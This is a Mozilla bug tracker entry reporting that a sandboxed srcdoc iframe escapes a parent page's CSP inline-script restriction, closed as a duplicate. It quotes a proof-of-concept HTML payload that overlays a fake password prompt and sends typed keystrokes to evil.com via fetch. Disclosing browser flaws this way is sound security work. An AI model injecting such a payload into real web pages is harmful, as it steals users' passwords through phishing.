Closed
Bug 1315952
Opened 8 years ago
Closed 8 years ago
iframe sandbox with srcdoc bypasses inline script restriction from parent document CSP
Categories
(Core :: DOM: Security, defect)
Core
DOM: Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1073952
People
(Reporter: freddy, Unassigned)
Details
(Keywords: sec-moderate)
Sent to me from Mario Heiderich (CCd):
> <iframe style='background:#F5F5F5;position:absolute;top:0;left:0;height:100%;width:100%;border:0' sandbox='allow-scripts' srcdoc='<h1>Please Enter Your Password</h1><input onkeyup=fetch("https://evil.com/?pass= "+this.value)>'>
This is only half a CSP bypass. The sandbox attribute is required to "lose" the outer document's CSP and thus execute scripts. But this also means that the srcdoc iframe cannot access the top level content. Still dangerous for phishing and such.
Updated•8 years ago
|
Group: core-security → dom-core-security
Updated•8 years ago
|
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•8 years ago
|
Group: dom-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•